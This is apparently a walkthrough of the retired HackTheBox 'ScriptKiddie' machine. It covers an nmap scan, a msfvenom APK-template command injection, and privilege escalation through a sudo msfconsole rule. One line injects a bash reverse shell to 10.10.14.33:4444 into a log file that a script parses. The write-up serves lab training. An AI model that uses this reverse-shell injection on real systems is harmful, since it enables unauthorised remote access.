![](/htb/machines/retired/scriptkiddie/splash.png)
Summary
ScriptKiddie is a Hackthebox Easy Linux machine created by Hackthebox User 0xdf. Initial Enumeration was creating a malicious apk and using that to get a shell. After getting a reverse shell as user of the box. Privilege Escalation was just running sudo msfconsole
and then bash to get root.
Enumeration
1 | # Nmap 7.91 scan initiated Sun Feb 7 12:46:45 2021 as: nmap -sC -sV -oN nmap/scriptkiddie 10.10.10.226 |
We now know that the Server is an Ubuntu
box. A SSH
server on port 22
and a web server
on 5000
is open.
Lets poke around 5000
as that have a more potential for Vulnerability.
Web (5000)
![](/htb/machines/retired/scriptkiddie/web-5000.png)
we see some kind web interface for nmap
msfvenom
and searchsploit
trying some command injection in nmap
gave invalid ip
and on
![](/htb/machines/retired/scriptkiddie/cmd-inj-nmap.png)
searchsploit
gave
![](/htb/machines/retired/scriptkiddie/cmd-sploits.png)
now msfvenom
is left lets try some command injection.
trying there also i was not successful.
As we also have searchsploit
lets look for any vulnerability on all the tools and saw an possible cmd injection on msfvenom
![](/htb/machines/retired/scriptkiddie/possible-msf.png)
so using the exploit 49491 we generate a payload but it didn’t work so i used
![](/htb/machines/retired/scriptkiddie/gen-payload.png)
1 | sudo msfrun db |
uploading the payload as msf template we get a shell as kid
User (kid)
![](/htb/machines/retired/scriptkiddie/user-shell.png)
and we can grab user.txt
Enumerating the box we find
1 | !/bin/bash |
![](/htb/machines/retired/scriptkiddie/scan-losers.png)
reading the code we know we need to get a cmd injection in ip to get me a cmd execution
so from the above script i created a payload which inject in sh and get
1 | echo "1 2 ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.33/4444 0>&1' #" > ~/logs/hackers |
which get me a shell as pwn
User (pwn)
![](/htb/machines/retired/scriptkiddie/pwn-shell.png)
Checking sudo -l
i saw i can run msfconsole
without password
![](/htb/machines/retired/scriptkiddie/sudo-l.png)
so i ran sudo msfconsole
and ran bash
from that to get a root shell.
Root
![](/htb/machines/retired/scriptkiddie/root.png)